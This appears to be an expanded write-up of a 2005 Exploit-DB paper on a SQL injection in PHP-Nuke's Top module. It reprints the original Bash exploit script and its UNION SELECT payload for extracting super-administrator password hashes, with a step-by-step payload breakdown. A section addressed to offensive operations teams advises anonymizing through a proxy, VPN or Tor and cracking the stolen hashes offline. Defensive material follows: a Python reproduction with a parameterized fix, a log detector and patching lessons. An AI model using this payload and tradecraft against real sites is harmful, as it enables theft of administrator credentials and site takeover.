Exploiting PHP-Nuke's Top Module for SQL Injection

What this paper is
This paper details a SQL injection vulnerability in the "Top module" of PHP-Nuke versions 6.x up to 7.6. The vulnerability allows an attacker to extract sensitive information, specifically the password hashes of administrators with super privileges, by manipulating the querylang parameter in the modules.php script.
Simple technical breakdown
The core of the vulnerability lies in how the PHP-Nuke Top module handles user input for the querylang parameter. When this parameter is not properly sanitized, an attacker can inject SQL commands. The exploit uses a UNION SELECT statement to combine the results of the attacker's query with the legitimate query that the module would normally execute. By carefully crafting the UNION SELECT statement, the attacker can retrieve data from other tables, in this case, the nuke_authors table to get the pwd (password hash) of super administrators.
Complete code and payload walkthrough
The provided code is a short Bash script that builds the attack URLs for a target; it does not send the requests itself.
#!/bin/bash
# This is just basic-ly modules.php?name=Top&querylang=union%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1
# works thou /str0ke
#
# PHPNuke Top Module Remote SQL Injection
# by Fabrizi Andrea 2005
# andrea.fabrizi [at] gmail.com
#
# Work with the PHPNuke latest version!
#
URL=$1;
PATH="$2/";
ANON="http://anonymouse.ws/cgi-bin/anon-www.cgi/";
echo -e "\n PHPNuke Top Module Remote SQL Injection"
echo -e " by Fabrizi Andrea 2005"
if [ "$URL" = "" ]; then
echo -e "\n USAGE: $0 [URL] [NukePath]"
echo -e " Example: $0 www.site.net phpNuke\n"
exit
fi;
if [ $PATH = "/" ]; then PATH=""; fi;
#anon_query_url="$ANON""http://$URL/$PATH""modules.php?name=Top&querylang=union/**/%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1";
anon_query_url="$ANON""http://$URL/$PATH""modules.php?name=Top&querylang=union%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1"; #changed line /str0ke
#query_url="http://$URL/$PATH""modules.php?name=Top&querylang=union/**/%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1";
query_url="http://$URL/$PATH""modules.php?name=Top&querylang=union%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1"; #changed line /str0ke
echo -e "\n - Anonymous Query URL: "$anon_query_url "\n";
echo -e " - Direct Query URL: " $query_url "\n";
echo -e " - If this version of PHPNuke is vurnerable you can see the Admin's Passwords Hashes at the end of 'Most voted polls' List!\n"
# milw0rm.com [2005-04-07]
Code Fragment/Block -> Practical Purpose Mapping:
- #!/bin/bash: Shebang line; the script is executed with Bash.
- # This is just basic-ly modules.php?name=Top&querylang=union%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1: A comment giving the crafted URL directly.
- # PHPNuke Top Module Remote SQL Injection: Header comment stating the script's purpose and author.
- URL=$1;: Assigns the first command-line argument (the target host) to the URL variable.
- PATH="$2/";: Assigns the second command-line argument (the path to the PHP-Nuke installation) to the PATH variable. This shadows the shell's own PATH; the script gets away with it only because echo is a Bash builtin and no external command is run afterwards.
- ANON="http://anonymouse.ws/cgi-bin/anon-www.cgi/";: Defines the URL of an anonymizing proxy service used to mask the requester's IP address.
- echo -e "\n PHPNuke Top Module Remote SQL Injection" and echo -e " by Fabrizi Andrea 2005": Print introductory messages to the console.
- if [ "$URL" = "" ]; then ... exit; fi;: Checks that the URL argument was provided; if not, prints usage instructions and exits.
- if [ $PATH = "/" ]; then PATH=""; fi;: Normalizes a bare root slash to an empty string to avoid double slashes in the final URL.
- anon_query_url="$ANON""http://$URL/$PATH""modules.php?name=Top&querylang=union%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1";: Constructs the full attack URL via the anonymizing proxy. Its parts:
  - $ANON: The anonymizer URL.
  - http://$URL/$PATH: The target website and its PHP-Nuke installation path.
  - modules.php?name=Top: The vulnerable script and module.
  - &querylang=union%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1: The SQL injection payload.
    - union: Combines the results of two SELECT statements.
    - %20: URL-encoded space.
    - select 0,pwd,0,0: Selects four columns. The pwd column carries the password hash; the 0s are placeholders that match the number of columns returned by the original query in modules.php?name=Top, so the exploit assumes that query returns four columns.
    - from nuke_authors: The table to read.
    - where radminsuper=1: Keeps only rows whose radminsuper column is 1, which identifies super administrators.
- query_url="http://$URL/$PATH""modules.php?name=Top&querylang=union%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1";: Constructs the direct attack URL without the anonymizing proxy.
- echo -e "\n - Anonymous Query URL: "$anon_query_url "\n"; and echo -e " - Direct Query URL: " $query_url "\n";: Print the two constructed URLs.
- echo -e " - If this version of PHPNuke is vurnerable you can see the Admin's Passwords Hashes at the end of 'Most voted polls' List!\n": Tells the user where the extracted hashes appear: at the end of the "Most voted polls" list that the Top module displays.
- # milw0rm.com [2005-04-07]: Source and publication date of the exploit.
Payload Explanation:
The core payload is the querylang parameter's value: union%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1.
- union: Combines the result sets of two or more SELECT statements; the number and order of columns in each SELECT must match.
- %20: The URL-encoded space character, so that the query text is interpreted correctly by the web server and database.
- select 0,pwd,0,0: Selects four columns.
  - 0: Literal placeholder values that match the number of columns in the original query run by modules.php?name=Top. If that query returns 4 columns, the UNION SELECT must also return 4.
  - pwd: The target column: the password hash stored in the nuke_authors table.
- from nuke_authors: Reads from the nuke_authors table, where PHP-Nuke stores user information, including administrator credentials.
- where radminsuper=1: Returns only rows whose radminsuper column equals 1, which in PHP-Nuke marks a super administrator account.
When the crafted URL is requested, the injected text becomes part of the Top module's own query, so the database runs the original SELECT and the attacker's SELECT as a single UNION and returns the combined rows. If the injection succeeds, the pwd values of super administrators from nuke_authors appear alongside the module's normal output, and the attacker reads the hashes out of that page.
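As an added illustration (not code from the paper or from PHP-Nuke), the following Python reproduces the flaw against an in-memory SQLite stand-in: a query builder that splices querylang into the SQL text, beside a hardened version that accepts only an allow-listed language code and binds it as a parameter. The poll table layout, the poll rows, the hashes and the allow-list are constructed assumptions, not PHP-Nuke's real schema or data.

```python
import sqlite3

# Constructed stand-in for the two tables the paper names. The poll table layout
# is a simplification, not PHP-Nuke's real schema; the hashes are made up.
SCHEMA = """
CREATE TABLE nuke_poll_desc (pollID INTEGER, pollTitle TEXT, voters INTEGER, timeStamp INTEGER, planguage TEXT);
CREATE TABLE nuke_authors (aid TEXT, pwd TEXT, radminsuper INTEGER);
INSERT INTO nuke_poll_desc VALUES (1, 'Favourite editor?', 42, 1112000000, 'english');
INSERT INTO nuke_poll_desc VALUES (2, 'Best distro?', 17, 1112100000, 'english');
INSERT INTO nuke_authors VALUES ('admin', '5f4dcc3b5aa765d9', 1);
INSERT INTO nuke_authors VALUES ('editor', 'aabbccdd00112233', 0);
"""
# The paper's payload, URL-decoded, as it reaches the query builder.
INJECTED_QUERYLANG = "union select 0,pwd,0,0 from nuke_authors where radminsuper=1"
ALLOWED_LANGS = {"english", "italian", "german"}  # assumed allow-list

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn

def top_polls_vulnerable(conn, querylang):
    # Mirrors the flaw: a request-controlled SQL fragment is spliced into the text.
    sql = ("SELECT pollID, pollTitle, voters, timeStamp FROM nuke_poll_desc "
           + querylang + " ORDER BY voters DESC")
    return conn.execute(sql).fetchall()

def top_polls_hardened(conn, lang):
    # Fix: the request supplies only a language code, which is checked against an
    # allow-list and bound as a parameter; the SQL text itself never changes.
    if lang not in ALLOWED_LANGS:
        raise ValueError("unsupported language code: %r" % lang)
    sql = ("SELECT pollID, pollTitle, voters, timeStamp FROM nuke_poll_desc "
           "WHERE planguage = ? ORDER BY voters DESC")
    return conn.execute(sql, (lang,)).fetchall()

def hardened_rejects(conn, value):
    try:
        top_polls_hardened(conn, value)
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    db = make_db()
    for row in top_polls_vulnerable(db, INJECTED_QUERYLANG):
        print(row)  # the last "poll" row carries the admin hash in the title column
    print(hardened_rejects(db, INJECTED_QUERYLANG))
```

The vulnerable path returns the admin hash as a fourth row with 0 voters, which is exactly why the script tells the user to look "at the end of 'Most voted polls' List".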
Practical details for offensive operations teams
- Required Access Level: No authenticated access is required; this is a remote, unauthenticated vulnerability.
- Lab Preconditions:
  - A target PHP-Nuke installation (v6.x to 7.6) accessible over the network.
  - The Top module enabled and accessible.
  - A vulnerable version of PHP-Nuke.
  - Network connectivity to the target.
- Tooling Assumptions:
  - A Bash-compatible shell environment (Linux, macOS, or Windows Subsystem for Linux).
  - A browser, curl or a similar HTTP client: the script only prints the URLs and never fetches them itself.
  - The anonymizing proxy anonymouse.ws must be operational and accessible.
- Execution Pitfalls:
  - Incorrect Path: If the PATH argument is incorrect, the script generates invalid URLs.
  - WAF/IPS: Modern Web Application Firewalls (WAFs) or Intrusion Prevention Systems (IPS) may detect and block the SQL injection pattern, especially the UNION SELECT syntax.
  - Database Schema Variations: While the paper assumes a nuke_authors table with pwd and radminsuper columns, older or modified versions might use different table or column names, rendering the exploit ineffective.
  - Output Parsing: The script only generates the URL. The operator has to fetch the URL and parse the output to extract the password hashes; the output format may vary and the hashes may be mixed with legitimate content.
  - Anonymizer Availability: The anonymouse.ws proxy might be down or rate-limited.
  - Number of Columns Mismatch: The exploit assumes the original Top module query returns exactly 4 columns. If it returns more or fewer, the UNION SELECT fails and the 0,pwd,0,0 part would need adjustment.
- Tradecraft Considerations:
  - Reconnaissance: Confirm the PHP-Nuke version and the presence of the Top module. Look for common PHP-Nuke installation paths.
  - Anonymization: Using the ANON proxy is a basic form of anonymization. For more robust operations, consider VPNs, Tor, or dedicated proxy chains.
  - Payload Delivery: The script generates URLs. These can be visited manually, or curl could be scripted to fetch them and process the output.
  - Post-Exploitation: Extracted password hashes can be used for offline cracking attempts.
Where this was used and when
- Context: This vulnerability was relevant for compromising PHP-Nuke websites, a popular content management system in the early to mid-2000s. Attackers would use this to gain access to administrator accounts, which could then be used to deface websites, spread malware, or pivot to other systems.
- Approximate Years: The exploit was published in 2005. PHP-Nuke versions 6.x and 7.x were prevalent around this time. Therefore, this vulnerability would have been actively exploited from its discovery until PHP-Nuke versions 7.6 and earlier were phased out or patched.
Defensive lessons for modern teams
- Input Validation and Sanitization: This is the most critical lesson. All user-supplied input, especially data that is incorporated into SQL queries, must be rigorously validated and sanitized to prevent injection attacks. Using parameterized queries or prepared statements is the standard defense.
- Web Application Firewalls (WAFs): While not a complete solution, WAFs can provide a layer of defense by detecting and blocking common SQL injection patterns. However, attackers can often bypass simple WAF rules with obfuscation.
- Regular Patching and Updates: Keeping web applications and their underlying frameworks (like PHP-Nuke in this case) up-to-date with the latest security patches is paramount. Vulnerabilities like this are typically fixed in later versions.
- Least Privilege Principle: Database users should operate with the minimum necessary privileges. The web application's database user should not have broad administrative rights.
- Security Audits and Code Reviews: Regularly auditing web application code for common vulnerabilities like SQL injection is essential.
- Monitoring and Logging: Implement robust logging for web server and application activity. Monitor logs for suspicious requests or patterns that might indicate an attempted or successful injection attack.
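To make the logging point concrete, an added example (not from the paper): a Python pass over constructed web-server access-log lines that pulls the querylang parameter out of modules.php requests, decodes it repeatedly, strips /**/ comment separators like those in the script's commented-out URLs, and flags values that carry SQL keywords or name nuke_authors. The log lines, the keyword threshold and the parameter name check are constructed assumptions.

```python
import re
from urllib.parse import urlparse, parse_qs, unquote

# Constructed access-log lines (combined-log style, documentation IP ranges).
SAMPLE_LOG = [
    '203.0.113.5 - - [07/Apr/2005:10:01:12 +0000] "GET /phpNuke/modules.php?name=Top HTTP/1.1" 200 5120',
    '203.0.113.5 - - [07/Apr/2005:10:01:30 +0000] "GET /phpNuke/modules.php?name=Top&querylang=union%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1 HTTP/1.1" 200 5311',
    '198.51.100.9 - - [07/Apr/2005:10:02:02 +0000] "GET /phpNuke/modules.php?name=Top&querylang=union/**/%2520select%25200,pwd,0,0%2520from%2520nuke_authors HTTP/1.1" 200 5311',
    '192.0.2.77 - - [07/Apr/2005:10:03:45 +0000] "GET /phpNuke/modules.php?name=Search&query=union HTTP/1.1" 200 2048',
]
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) ')
SQL_RE = re.compile(r"\b(union|select|from|where)\b", re.I)

def normalize(value):
    # Decode until stable (catches double encoding such as %2520), then drop
    # inline comments used as whitespace substitutes (union/**/select).
    prev = None
    while value != prev:
        prev, value = value, unquote(value)
    return re.sub(r"/\*.*?\*/", " ", value)

def suspicious_querylang(value):
    # Heuristic: two or more distinct SQL keywords, or any mention of the
    # authors table. A single keyword alone is allowed to limit false positives.
    text = normalize(value)
    keywords = {m.lower() for m in SQL_RE.findall(text)}
    return len(keywords) >= 2 or "nuke_authors" in text.lower()

def scan(lines):
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        src, target = m.groups()
        url = urlparse(target)
        if not url.path.endswith("/modules.php"):
            continue
        params = parse_qs(url.query)  # already performs one round of decoding
        for value in params.get("querylang", []):
            if suspicious_querylang(value):
                hits.append((src, normalize(value)))
    return hits

if __name__ == "__main__":
    for src, payload in scan(SAMPLE_LOG):
        print(src, "->", payload)
```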
ASCII visual
+-----------------+      +-----------------+      +-----------------+
|   Attacker's    |----->|   Anonymizing   |----->| Target PHP-Nuke |
|    Machine      |      | Proxy (Optional)|      |   Web Server    |
+-----------------+      +-----------------+      +-----------------+
                                                           |
                                                           | modules.php?name=Top&querylang=union%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1
                                                           v
                                                  +-----------------+
                                                  | PHP Application |
                                                  |  (Vulnerable)   |
                                                  +-----------------+
                                                           |
                                                           | Executes original query + UNION SELECT
                                                           v
                                                  +-----------------+
                                                  | Database Server |
                                                  | (MySQL/etc.)    |
                                                  +-----------------+
                                                           |
                                                           | Returns:
                                                           |  - Original Module Data
                                                           |  - Extracted pwd hashes
                                                           v
                                                  +-----------------+
                                                  | PHP Application |
                                                  | (Output to user)|
                                                  +-----------------+
This diagram illustrates the flow of the attack. The attacker crafts a malicious URL, optionally routed through an anonymizing proxy, and sends it to the target web server, where the PHP application processes it. The vulnerable script executes the query with the injected UNION SELECT against the database. The database returns the combined results, including the extracted password hashes, which the PHP application then renders in its output.
Source references
- Paper ID: 921
- Paper Title: PHP-Nuke 6.x < 7.6 Top module - SQL Injection
- Author: Fabrizi Andrea
- Published: 2005-04-07
- Keywords: PHP, webapps
- Paper URL: https://www.exploit-db.com/papers/921
- Raw Exploit URL: https://www.exploit-db.com/raw/921